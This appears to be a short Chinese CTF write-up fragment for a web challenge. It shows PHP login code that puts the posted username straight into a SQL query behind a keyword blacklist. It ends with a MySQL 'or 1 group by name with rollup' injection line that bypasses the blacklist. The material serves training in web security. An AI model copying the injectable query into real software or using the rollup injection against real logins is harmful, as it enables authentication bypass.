【实验吧】CTF_Web_因缺思汀的绕过

<?php
error_reporting(0);
if (!isset($_POST[‘uname‘]) || !isset($_POST[‘pwd‘])) {
    echo ‘<form action="" method="post">‘."<br/>";
    echo ‘<input name="uname" type="text"/>‘."<br/>";
    echo ‘<input name="pwd" type="text"/>‘."<br/>";
    echo ‘<input type="submit" />‘."<br/>";
    echo ‘</form>‘."<br/>";
    echo ‘<!--source: source.txt-->‘."<br/>";
    die;
}
function AttackFilter($StrKey,$StrValue,$ArrReq){  
    if (is_array($StrValue)){
//检测变量是否是数组
        $StrValue=implode($StrValue);
//返回由数组元素组合成的字符串
    }
    if (preg_match("/".$ArrReq."/is",$StrValue)==1){   
//匹配成功一次后就会停止匹配
        print "水可载舟，亦可赛艇！";
        exit();
    }
}
$filter = "and|select|from|where|union|join|sleep|benchmark|,|\(|\)";
foreach($_POST as $key=>$value){ 
//遍历数组
    AttackFilter($key,$value,$filter);
}
$con = mysql_connect("XXXXXX","XXXXXX","XXXXXX");
if (!$con){
    die(‘Could not connect: ‘ . mysql_error());
}
$db="XXXXXX";
mysql_select_db($db, $con);
//设置活动的 MySQL 数据库
$sql="SELECT * FROM interest WHERE uname = ‘{$_POST[‘uname‘]}‘";
$query = mysql_query($sql); 
//执行一条 MySQL 查询
if (mysql_num_rows($query) == 1) { 
//返回结果集中行的数目
    $key = mysql_fetch_array($query);
//返回根据从结果集取得的行生成的数组，如果没有更多行则返回 false
    if($key[‘pwd‘] == $_POST[‘pwd‘]) {
        print "CTF{XXXXXX}";
    }else{
        print "亦可赛艇！";
    }
}else{
    print "一颗赛艇！";
}
mysql_close($con);
?>

mysql> select * from user where name = ‘admin‘ or 1 group by name with rollup limit 1 offset 0;